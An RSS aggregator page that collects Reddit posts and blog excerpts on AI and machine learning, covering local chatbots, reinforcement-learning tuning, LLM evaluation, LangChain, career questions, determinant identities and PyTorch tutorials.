    Hey All - i am looking for an open-source chatbot. He will get a bench of PDF documents (training-Data). this data should be searchable and the bot should be able to answer questions in different languages. so far, so ez: we´re in germany - which means we do have hard regulations for servers, which are NOT hosted in the EU (god i really hate to write that). so we need a model, which can be installed here, train it hre and finally it should his work here. If you have any advice - i would be really thankful! submitted by /u/myreddit333 [link] [comments]  ( 8 min )
    How is it possible that there were no LLM AIs, then there was ChatGPT, now there are dozens of similar products?
    Like, didn’t ChatGPT need a whole company in stealth mode for years, with hundreds of millions of investment? How is it that they release their product and then overnight there are competitors – and not just from the massive tech companies? submitted by /u/Aquillyne [link] [comments]  ( 8 min )
    The Rockstars of the AI World
    AGI: Brainiac robots will be like the ultimate multitaskers on steroids. They will possess mind-blowing cognitive abilities, making them the geniuses who can solve complex math problems in their sleep and then casually drop fashion advice that would make Coco Chanel blush. You might catch them pondering the mysteries of the universe or composing symphonies that give Beethoven a run for his money. Are they secretly working as undercover geniuses on the weekends? All we know is that AGI will be among us to challenge our notion of human intelligence and make us wonder if we should start polishing our robot-dance moves to keep up and maintain them entertained. submitted by /u/Powerful-Pumpkin-938 [link] [comments]  ( 8 min )
    Using google account data for AI personalization
    Brand new to AI and trying to understand possible functionalities, so bear with me if i sound uneducated. i know that you can download all of your google account data, (which i think is probably the largest amount of personalized information that most of us have easy access to. includes youtube history, google pay transactions, browsing history, tons of other info.) but my question is; after downloading this data, how could you implement this into some localized ai program to improve your life? it knows what restaurants you frequent, items you buy, travel patterns, vacations, email history, ect i would love to hear peoples ideas on this, thanks. submitted by /u/G-Boogie42 [link] [comments]  ( 8 min )
  • Open

    How would one normalize observations in off-policy online reinforcement learning?
    Can someone please help with this question . Please let me know if you'd like me to paste the whole question in the description here. Thank you! submitted by /u/Academic-Rent7800 [link] [comments]  ( 8 min )
    Tuning Rewards/Adding More Rewards in RL is a headache
    I am working on RL and it is really exciting. But in a lot of cases I don't get the desired behaviours i want. So i either tune the weights of existing rewards or adding more reward terms trying to fix that, but later I realized that adding more rewards just make the problem more complex and I even get worse performance than before. I also tried hyperparameter tuning, but they are really slow and I don't see too much difference compared with my heuristic choice. I read some RL papers and I never figure out where these magic weights come from. Anyone can provide some advice will be very helpful :) submitted by /u/Alchemist1990 [link] [comments]  ( 8 min )
    Causes of RL agent reaching a more optimal policy but not continuing to improve
    Hey, I'm developing RL agent for optimal setpoint control but I'm experiencing some weird behaviour where the agent would reach a policy where it will perform better than all other previous policies, but doesn't continue improving and goes back to get stuck at a local minimum. I'm assuming this behaviour comes from wrong hyperparameter tuning, but I was wondering if there could be different sources for this behaviour. ​ Training (lower score is more optimal) This is the picture from training. I'm training with PPO and had non-zero value for entropy-coefficient. Edit: When I stop training at the dips, and test the agent, it will quite consistently score better. submitted by /u/LeSUTHU [link] [comments]  ( 8 min )
    "Solving math word problems with process- and outcome-based feedback", Uesato et al 2022 {DM}
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Extensions for SAC
    I am a starter in Reinforcement learning and stumbeled across SAC. While all other off-policy algorithm seem to have extensions (DQN,DDQN/DDPG,TD3) I am wondering what are extensions for SAC that are worth having a look at? I already found 2 papers (DR3 and TQC) but im not experienced enough to evaluate them. So i thought about building them and comparing them to others. Would be nice to hear someones opinion:) submitted by /u/MChiefMC [link] [comments]  ( 8 min )
  • Open

    [D] NVIDIA Rapid Vs Pandas
    Hello ML Team, I am reaching out on behalf of Data Care LLC. We developed a large Kubernetes-based cluster with thousands of A4000 GPUs and are currently conducting a benchmarking experiment to compare NVIDIA RAPIDS against Pandas for various size workloads that needs a bit of scrubbing. Here are the details: Infra1: Pandas with 6 CPU cores, 16 GB RAM Infra2: A4000 with 16 GB VRAM, 16 GM RAM and 6 CPU Cores. Synthetic dataset of .8 GB, 1.6Gb, 3.2 GB, 6.4 GB sizes with errors with data that need to be scrubbed. You are welcome to define your own dataset. If any of you are interested in participating in this experiment, we would be happy to provide you with the necessary compute resources. To sign up for this experiment, please visit www.thedatacare.com/experiment-rapid We greatly appreciate your participation and encourage you to publish your results to contribute to the community. Thank you, Arun Data Care LLC submitted by /u/arunpalepu1981 [link] [comments]  ( 9 min )
    [DISCUSSION] How much can we trust OpenAI (and other large AI companies) will keep our fine tuned models and data sets private?
    tldr: Do you trust OpenAI or other large AI companies with your data? Do you reckon it's just a matter of time before they find all of the data, so might as well contribute to their research project and benefit from it while you can? Or do you prefer to go the open sourced route instead for this reason? Here's is my concern: Some of my team members are very high on Open AI's models, their ease of use, and how smart they are out the box. Now, Open AI (relatively recently) published a statement saying that they will not use your fine tuned models or data sets internally to improve their products, but given their history and the value of these fine tuned models and their corresponding datasets, I'm uncertain to what extent we are able to trust that they will keep our data private. I like t…  ( 9 min )
    Just was Offered a $130k Machine Learning Engineer Position - Is this Salary too Low? [D]
    I am about to graduate with my master's and I was offered a Machine Learning Engineer role with a salary of $130k. I have data science experience, but not much programming experience. I pushed back on the salary and said I was expecting a little more (I was paid more as a Data Scientist), and the recruiter said the team was taking a chance on me and I need to prove myself before they would raise my salary. I also want to mention I am switching into work that is more coding heavy than what I was doing as a Data Scientist. The job is exactly what I want to do though and the team was really great to talk to. The company has great reviews online and wonderful benefits. I am leaning towards just taking the job but this is my first job interview and I don't want to sell myself short. FYI I live in California, not the Bay Area. submitted by /u/datatastic08200 [link] [comments]  ( 9 min )
    [D] What have been your use cases for LLM autonomous agents?
    I've been using GPT for completions on a daily basis for a while now - code completion and search-like chatting, basically. I've recently been playing around with both ChatGPT plugins and LangChain for autonomous-agent-like behavior, and although the idea of the LLM interacting with the environment through API calls or code interpretation seems promising, in practice I haven't found such a useful and usable case for it like completions yet. LangChain's OpenAPI toolkit with its planner/controller agent duo seems to get lost 90% of the time, making it unusable. This happens even with an /api endpoint telling it exactly how to interact with the API and prompt templates suggesting that this endpoint be used to get the API specs. Maybe I'm just not getting it right... As for ChatGPT plugins, other than web search for more updated results I haven't really found a use case where I could not do the same thing with completions. Code Interpreter shaves off a few seconds vs completions and running whatever script it produces locally, but it's not very useful in face of compliance or privacy requirements of not uploading stuff into OpenAI. For example I wanted to speed up a work related video and add a separate audio track to it. I couldn't upload the video to OpenAI as it contained internal work stuff, so I just used completions for an ffmpeg script to do the job and ran it locally. Same thing with transforming or plotting CSV data - can't really update customer data to OpenAI, so just get the script and run it locally. Anyway, I can think of a lot of cool use cases for autonomous agents and the like, but I haven't been able to actually use it in my daily routine, unlike text completion. Have you been using autonomous agents successfully and regularly? submitted by /u/osantacruz [link] [comments]  ( 9 min )
    [D] When will the LLM winter come?
    Everyone is jumping on the bandwagon of LLMs, and it seems like we should follow suit. But why? LLMs are impressive; they can play chess, emulate a Linux terminal, perform mathematical calculations, convert code, and more. However, in most cases, they perform these tasks poorly, which means they cannot be used as is, at least not for now. While we come across numerous cool demos, the results are often cherry-picked and not applicable to real business use cases. I can only identify a few limited use cases where LLMs truly shine: QA, summarization, and acting as a co-pilot for tasks such as coding, writing, and education etc. In essence, they excel in seq2seq tasks. There are some notable drawbacks that should be acknowledged: Cost: The cost of using LLMs will never be cheaper than specialized solutions. Latency: Building real-time applications with LLMs is extremely challenging. Quality and Accuracy: For now, LLMs lack strong reasoning capabilities. Reliability: Hallucinations are still an issue. Occasionally, the model fails to follow instructions. Quotas: Currently, the quotas imposed on LLMs are too low for large-scale production applications. It is possible that most of these problems will be resolved in the future. However, the question remains: how long will it take? Will it be 1 year, 5 years, or even 10 years? Unfortunately, we need to see a ROI this year. Anyway, just want to remind you that there is no free lunch! submitted by /u/___mlm___ [link] [comments]  ( 9 min )
    [D] Regression Problem
    I’m trying to develop a ML model to be able to predict “time series” data. It’s not actually time series, it’s temperature series. But regardless, the order matters. I have 20 sets of tabular data in separate csv’s that each contain 3 columns. Column 1 is temperature from 800 to 1360, column 2 are values I’d like to be able to predict, and column 3 contains values that I’d like to use as input to predict column 2 values at each respective temperature. Because the temperature range is between 800 and 1360, each csv has 560 rows of data (1360 - 800 = 560). So in total, there’s 11,200 rows of data (20 sets * 560 = 11,200 total rows). The data in each column, excluding the temperature column, are second order polynomials. So I’m essentially trying to get from one polynomial (column 3) to another (column 2). What would be the best ML method to achieve this given my problem? I know there’s an underlying pattern but I need ML to help me determine it. Appreciate any help here, thanks!! submitted by /u/cgifted7 [link] [comments]  ( 9 min )
    Seeking Participants for AI-related Survey[R]
    I am currently working on my IB Extended Essay, and I would greatly appreciate your help in gathering valuable insights from individuals knowledgeable in the field of AI. The purpose of my survey is to understand the perspectives of AI enthusiasts and professionals like you. If you have a few minutes to spare, I kindly request you to participate in my survey. Your input will contribute significantly to my research and help me gain a deeper understanding of the topic. The survey covers various aspects of AI, and your expertise will be invaluable in shaping the results. Survey Link: https://forms.gle/PVGrRbPLTpZRbbpL9 Rest assured that all responses will be kept confidential and only used for academic purposes. Additionally, feel free to share this survey with others who might be interested or knowledgeable in the field. Thank you in advance for your time and contributions! Your participation will greatly aid in the successful completion of my IB Extended Essay. submitted by /u/KVNG_Winston [link] [comments]  ( 9 min )
    [R] All about evaluating Large language models
    I explored my curiosity on how to best evaluate LLMs and LLM application and consolidated my thoughts in this article https://explodinggradients.com/all-about-evaluating-large-language-models https://preview.redd.it/btfz3loxb6bb1.png?width=1920&format=png&auto=webp&s=94d1789c0e0f8c1dac50864996d908497a45a241 submitted by /u/iamikka [link] [comments]  ( 8 min )
    [D] Hacking LangChain for Fun and Profit
    https://blog.kevinhu.me/2023/07/10/hacking-langchain-for-fun-and-profit/ I'm starting a series of blogs to delve into LangChain. Hope this helps anyone who's interested in LLM and building with LangChain. submitted by /u/OLDGUN [link] [comments]  ( 8 min )
    [D] Forcing diversification in similarity search
    I’m using a vector database for storing image embeddings and using it for similarity search. If I pick top ten most similar vectors I can sometimes end up inside of an echo chamber with almost “duplicates” or too similar images. I would like to diversify the results so that all the results are close to the input vector but different between themselves. Are there common patterns/algorithms for this type of diversification? The idea that I have: I want to pick 10 images. I would query the database for a 100 of the most similar embeddings and use a clustering algorithm to cluster them into 10 clusters. Finally, I would pick one image from each cluster. submitted by /u/alkibijad [link] [comments]  ( 8 min )
    [D] Website to get historical price for agriculture commodities?
    Hey guys, i want to make price prediction for agriculture commodities such as grain, corn and coffee, I need Historical price data like open, low, high, close, and volume. You guys know which website that provides those data for free??? I tried https://markets.businessinsider.com/ but it was no help submitted by /u/Classic-Fee6889 [link] [comments]  ( 8 min )
    [P] We built a paper sharing platform. Looking for alpha testers!
    https://www.entepond.com We are a group of industry practitioners who got tired with sharing papers via social media platforms. They are not designed for that. It’s hard enough to keep track of the trending/latest papers nowadays. So, we built Pond, a paper sharing platform that makes sense. submitted by /u/dockerun [link] [comments]  ( 8 min )
    [D][R] Help with bachelor thesis
    Hi all, I am finishing my 3rd year UG AI program, and I’ve already been admitted to a MSc in AI. However, I need some ideas for my thesis which should be around 30 pages long. I’ve been doing some research on what I would like to study, but I still havent found anything I like. I am open to both an applied ML topic and a more theoretical one, so feel free to suggest something you think is appropriate 😄 submitted by /u/AskAmbitious5697 [link] [comments]  ( 8 min )
    [D] MPT-30b or Falcon 40b: which one is the better option
    In the open-source community, two models that have gained a lot of popularity is MPT and Falcon. However, I wonder which one is the best LLM. What are your considerations about both models? submitted by /u/paulo_zip [link] [comments]  ( 8 min )
    [Project] Brute force for popular models, Feature Reduction and Scaling Techniques for Classification [Python]
    This is my first article to try something new, it is brute forcing on classifications problems Does anybody have suggestions to improve the code, add more features, or suggest another idea https://baroodz.medium.com/brute-force-for-popular-models-feature-reduction-and-scaling-techniques-for-classification-69be9c0426b9 https://github.com/Barood-cmd/BruteforceML/ All opinions appreciated submitted by /u/Barood_D [link] [comments]  ( 8 min )
  • Open

    Visualizing a determinant identity
    The previous post discussed an algorithm developed by Charles Dodgson (better known as Lewis Carroll) for computing determinants. The key identity for proving that Dodgson’s algorithm is correct involves the Desnanot-Jacobi identity from 1841. The identity is intimidating in its symbolic form and yet easy to visualize. In algebraic form the identity says Here a […] Visualizing a determinant identity first appeared on John D. Cook.  ( 5 min )
    How Lewis Carroll computed determinants
    Charles Dodgson, better known by his pen name Lewis Carroll, discovered a method of calculating determinants now known variously as the method of contractants, Dodgson condensation, or simply condensation. The method was devised for ease of computation by hand, but it has features that make it a practical method for computation by machine. Overview The […] How Lewis Carroll computed determinants first appeared on John D. Cook.  ( 6 min )
  • Open

    3 Questions: Honing robot perception and mapping
    Luca Carlone and Jonathan How of MIT LIDS discuss how future robots might perceive and interact with their environment.  ( 8 min )
  • Open

    Design Speed Takes the Lead: Trek Bicycle Competes in Tour de France With Bikes Developed Using NVIDIA GPUs
    NVIDIA RTX is spinning new cycles for designs. Trek Bicycle is using GPUs to bring design concepts to life. The Wisconsin-based company, one of the largest bicycle manufacturers in the world, aims to create bikes with the highest-quality craftsmanship. With its new partner Lidl, an international retailer chain, Trek Bicycle also owns a cycling team, Read article >  ( 7 min )
  • Open

    Renovating computer systems securely and progressively with APRON
    This research paper was accepted by 2023 USENIX Annual Technical Conference (ATC), which is dedicated to advancing the field of systems research. Whether they’re personal computers or cloud instances, it’s crucial to ensure that the computer systems people use every day are reliable and secure. The validity of these systems is critical because if storage […] The post Renovating computer systems securely and progressively with APRON appeared first on Microsoft Research.  ( 10 min )
  • Open

    AIOps above the radar – Using AI to monitor your AI infrastructure
    When an enterprise project is low-profile (“below the radar”), then it is not likely to be the target of bad actors. Similarly, if some part of that project’s infrastructure fails or falters, then the consequences of the problem and/or the urgency of providing a solution are usually manageable. But when a high-profile (“above the radar”)… Read More »AIOps above the radar – Using AI to monitor your AI infrastructure The post AIOps above the radar – Using AI to monitor your AI infrastructure appeared first on Data Science Central.  ( 22 min )
    Security data lakes and the future of organizational security
    Evolving technological advancements have created a far more data-centric world. This has dramatically changed the enterprise landscape, while also creating more data silos. The explosion of cybersecurity tools and mounds of data in modern enterprises have made it difficult to combine data to create a unified view. This has resulted in siloed data that’s also… Read More »Security data lakes and the future of organizational security The post Security data lakes and the future of organizational security appeared first on Data Science Central.  ( 21 min )
    Sentience: AI has demystified human consciousness, intelligence
    There is a recent article, Unraveling the Mystery of Human Consciousness, where it was stated that, “Consciousness makes us capable of experiencing the scent of a rose, the touch of a breeze, the taste of food, the sound of music, and the sight of a sunrise. We also have a unique ability to be aware… Read More »Sentience: AI has demystified human consciousness, intelligence The post Sentience: AI has demystified human consciousness, intelligence appeared first on Data Science Central.  ( 19 min )
    Exploring intelligent search solutions: A comparative analysis of Amazon Kendra integration and large language model crawlers
    Amazon Kendra and LLamaIndex can help with knowledge integration but fall short in connecting diverse knowledge sources, to enable efficient intelligent search. In this article, we compare the existing solutions and explain how to overcome their limitations using a Google Drive crawler. Companies often face difficulties in consolidating their knowledge base when their data is… Read More »Exploring intelligent search solutions: A comparative analysis of Amazon Kendra integration and large language model crawlers The post Exploring intelligent search solutions: A comparative analysis of Amazon Kendra integration and large language model crawlers appeared first on Data Science Central.  ( 27 min )
    What’s missing from ChatGPT and other LLMs?
    Recent developments in artificial intelligence remind me of the automotive industry in the late 19th and early 20th century. In that case, it took the industry several decades to commit to internal combustion engines. And while that picture was still unclear, there were over 250 different car manufacturers, some of whom were producing steam-powered cars.… Read More »What’s missing from ChatGPT and other LLMs? The post What’s missing from ChatGPT and other LLMs? appeared first on Data Science Central.  ( 21 min )
  • Open

    Google at ACL 2023
    Posted by Malaya Jules, Program Manager, Google This week, the 61st annual meeting of the Association for Computational Linguistics (ACL), a premier conference covering a broad spectrum of research areas that are concerned with computational approaches to natural language, is taking place online. As a leader in natural language processing and understanding, and a Diamond Level sponsor of ACL 2023, Google will showcase the latest research in the field with over 50 publications, and active involvement in a variety of workshops and tutorials. bold). Board and Organizing Committee Dan Garrette Workshop chairs include: Annie Louis Publication chairs include: Lei Shu Program Committee includes: Vinodkumar Prabhakaran, Najoung Kim, Markus Freitag Spotlight papers NusaCrowd: O…  ( 93 min )

  • Open

    Implementing Gradient Descent in PyTorch
    The gradient descent algorithm is one of the most popular techniques for training deep neural networks. It has many applications in fields such as computer vision, speech recognition, and natural language processing. While the idea of gradient descent has been around for decades, it’s only recently that it’s been applied to applications related to deep […] The post Implementing Gradient Descent in PyTorch appeared first on MachineLearningMastery.com.  ( 25 min )

  • Open

    Training a Linear Regression Model in PyTorch
    Linear regression is a simple yet powerful technique for predicting the values of variables based on other variables. It is often used for modeling relationships between two or more continuous variables, such as the relationship between income and age, or the relationship between weight and height. Likewise, linear regression can be used to predict continuous […] The post Training a Linear Regression Model in PyTorch appeared first on MachineLearningMastery.com.  ( 24 min )
    Making Linear Predictions in PyTorch
    Linear regression is a statistical technique for estimating the relationship between two variables. A simple example of linear regression is to predict the height of someone based on the square root of the person’s weight (that’s what BMI is based on). To do this, we need to find the slope and intercept of the line. […] The post Making Linear Predictions in PyTorch appeared first on MachineLearningMastery.com.  ( 21 min )

  • Open

    Loading and Providing Datasets in PyTorch
    Structuring the data pipeline in a way that it can be effortlessly linked to your deep learning model is an important aspect of any deep learning-based system. PyTorch packs everything to do just that. While in the previous tutorial, we used simple datasets, we’ll need to work with larger datasets in real world scenarios in […] The post Loading and Providing Datasets in PyTorch appeared first on MachineLearningMastery.com.  ( 20 min )

  • Open

    Using Dataset Classes in PyTorch
    In machine learning and deep learning problems, a lot of effort goes into preparing the data. Data is usually messy and needs to be preprocessed before it can be used for training a model. If the data is not prepared correctly, the model won’t be able to generalize well. Some of the common steps required […] The post Using Dataset Classes in PyTorch appeared first on MachineLearningMastery.com.  ( 21 min )

  • Open

    Calculating Derivatives in PyTorch
    Derivatives are one of the most fundamental concepts in calculus. They describe how changes in the variable inputs affect the function outputs. The objective of this article is to provide a high-level introduction to calculating derivatives in PyTorch for those who are new to the framework. PyTorch offers a convenient way to calculate derivatives for […] The post Calculating Derivatives in PyTorch appeared first on Machine Learning Mastery.  ( 20 min )

  • Open

    Two-Dimensional Tensors in Pytorch
    Two-dimensional tensors are analogous to two-dimensional metrics. Like a two-dimensional metric, a two-dimensional tensor also has $n$ number of rows and columns. Let’s take a gray-scale image as an example, which is a two-dimensional matrix of numeric values, commonly known as pixels. Ranging from ‘0’ to ‘255’, each number represents a pixel intensity value. Here, […] The post Two-Dimensional Tensors in Pytorch appeared first on Machine Learning Mastery.  ( 21 min )

  • Open

    One-Dimensional Tensors in Pytorch
    PyTorch is an open-source deep learning framework based on Python language. It allows you to build, train, and deploy deep learning models, offering a lot of versatility and efficiency. PyTorch is primarily focused on tensor operations while a tensor can be a number, matrix, or a multi-dimensional array. In this tutorial, we will perform some […] The post One-Dimensional Tensors in Pytorch appeared first on Machine Learning Mastery.  ( 22 min )

  • Open

    365 Data Science courses free until November 21
    Sponsored Post   The unlimited access initiative presents a risk-free way to break into data science.     The online educational platform 365 Data Science launches the #21DaysFREE campaign and provides 100% free unlimited access to all content for three weeks. From November 1 to 21, you can take courses from renowned instructors and earn […] The post 365 Data Science courses free until November 21 appeared first on Machine Learning Mastery.  ( 15 min )

  • Open

    Attend the Data Science Symposium 2022, November 8 in Cincinnati
    Sponsored Post      Attend the Data Science Symposium 2022 on November 8 The Center for Business Analytics at the University of Cincinnati will present its annual Data Science Symposium 2022 on November 8. This all day in-person event will have three featured speakers and two tech talk tracks with four concurrent presentations in each track. The […] The post Attend the Data Science Symposium 2022, November 8 in Cincinnati appeared first on Machine Learning Mastery.  ( 10 min )

  • Open

    My family's unlikely homeschooling journey
    My husband Jeremy and I never intended to homeschool, and yet we have now, unexpectedly, committed to homeschooling long-term. Prior to the pandemic, we both worked full-time in careers that we loved and found meaningful, and we sent our daughter to a full-day Montessori school. Although I struggled with significant health issues, I felt unbelievably lucky and fulfilled in both my family life and my professional life. The pandemic upended my careful balance. Every family is different, with different needs, circumstances, and constraints, and what works for one may not work for others. My intention here is primarily to share the journey of my own (very privileged) family. Our unplanned introduction to homeschooling For the first year of the pandemic, most schools in California, where …  ( 7 min )

  • Open

    The Jupyter+git problem is now solved
    Jupyter notebooks don’t work with git by default. With nbdev2, the Jupyter+git problem has been totally solved. It provides a set of hooks which provide clean git diffs, solve most git conflicts automatically, and ensure that any remaining conflicts can be resolved entirely within the standard Jupyter notebook environment. To get started, follow the directions on Git-friendly Jupyter. Contents The Jupyter+git problem The solution The nbdev2 git merge driver The nbdev2 Jupyter save hook Background The result Postscript: other Jupyter+git tools ReviewNB An alternative solution: Jupytext nbdime The Jupyter+git problem Jupyter notebooks are a powerful tool for scientists, engineers, technical writers, students, teachers, and more. They provide an ideal notebook environment for interact…  ( 7 min )
2023-08-09T00:51:34.822Z osmosfeed 1.15.1